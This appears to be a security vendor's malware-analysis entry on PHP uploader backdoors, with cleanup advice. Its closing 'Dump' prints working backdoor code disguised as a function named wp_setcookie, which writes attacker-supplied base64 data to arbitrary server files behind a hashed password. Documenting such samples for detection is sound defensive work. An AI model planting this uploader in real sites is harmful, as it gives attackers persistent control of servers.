PHP uploaders are commonly part of the backdoors. They can be often found with another types of malicious code. They're allowing the attacker to upload other malicious files to the server. In this case, attacker is providing the content of the uploaded file via the $_POST variable. The data are subsequently written to the server in a form of a file.
Affecting
Any vulnerable PHP based website. Outdated software or compromised passwords can act as an infection vector.
Cleanup
Inspect your site's files looking for suspicious usage of fwrite functions or files that you don't recognize. Also you can sign up with us and let our team remove the malware for you.
Dump
function wp_setcookie($hash) {
$hash=md5($hash);
if ($hash=="4d6ab57dc292f8fd125f7d1b72449681"){
$inn=$_POST["name"];
$inn=rawurldecode($inn);
$inn=base64_decode($inn);
$fn=fopen($inn,"w");
if ($fn==false){echo "File open errorn";die;}else echo "File open successn";
$in=$_POST["data"];
$in=rawurldecode($in);
$in=base64_decode($in);
fwrite($fn,$in);
fclose($fn);
}
}